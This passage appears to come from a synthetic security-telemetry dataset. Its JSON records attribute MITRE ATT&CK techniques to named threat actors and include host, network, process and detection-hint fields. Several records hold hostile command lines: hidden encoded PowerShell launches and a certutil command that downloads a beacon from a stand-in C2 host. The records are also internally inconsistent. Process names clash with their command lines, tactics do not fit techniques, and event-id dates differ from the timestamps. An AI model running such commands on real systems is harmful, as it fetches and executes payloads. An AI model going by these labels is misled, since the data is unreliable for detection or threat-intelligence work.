Log","timestamp":"2025-06-28T11:05:38.000Z","user":{"name":"CORP\\831gq8ss6o9u","sid":"S-1-5-21-873785307-277004042-7207"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Impact","Lateral Movement"],"technique_id":"T1071.001"},"event_id":"evt_volttyphoon_20261029T133454000Z_0007591","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.195.154.109","name":"DB-ORACLE-NSTTHEM4IC","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7591Volt TyphoonT1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.157.187.137","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-12-13T02:29:29.000Z","user":{"name":"i-cjri1old0y9l","sid":"S-1-5-21-562480880-151234719-9313"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Lateral Movement"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20250811T045332000Z_0007593","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.233.199.220","name":"IAM-ROLE-4N30P65TZQ","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7593Lapsus$T1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.49.248.53","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-09-17T00:15:05.000Z","user":{"name":"azuread\\8qbos89q3z39","sid":"S-1-5-21-398380087-863553820-3068"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Defense Evasion","Command and Control","Persistence"],"technique_id":"T1570"},"event_id":"evt_fin7_20260803T080807000Z_0007595","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.195.29.74","name":"IAM-ROLE-60LN4M05ZL","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7595FIN7T1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.1.16.44","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-03-16T09:58:23.000Z","user":{"name":"i-ncic1ib3ify0","sid":"S-1-5-21-990151172-437743575-3729"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Persistence","Collection"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20261104T121401000Z_0007597","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.95.60.246","name":"EC2-INST-HLAB1E0U99","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7597UNC4841T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.101.86.215","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-02-08T01:36:56.000Z","user":{"name":"arn:aws:iam::8awhs6kne1qp","sid":"S-1-5-21-823379704-984345461-7044"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Initial Access","Impact","Credential Access"],"technique_id":"T1484.001"},"event_id":"evt_fin7_20260225T002859000Z_0007599","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.188.226.223","name":"EC2-INST-8IBWRHQPIE","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7599FIN7T1484.001"},"network":{"domain":"github.com","dst_ip":"1.1.202.16","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-10-20T22:00:47.000Z","user":{"name":"azuread\\ppgmvrvwxhud","sid":"S-1-5-21-313469432-242645644-3288"}} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.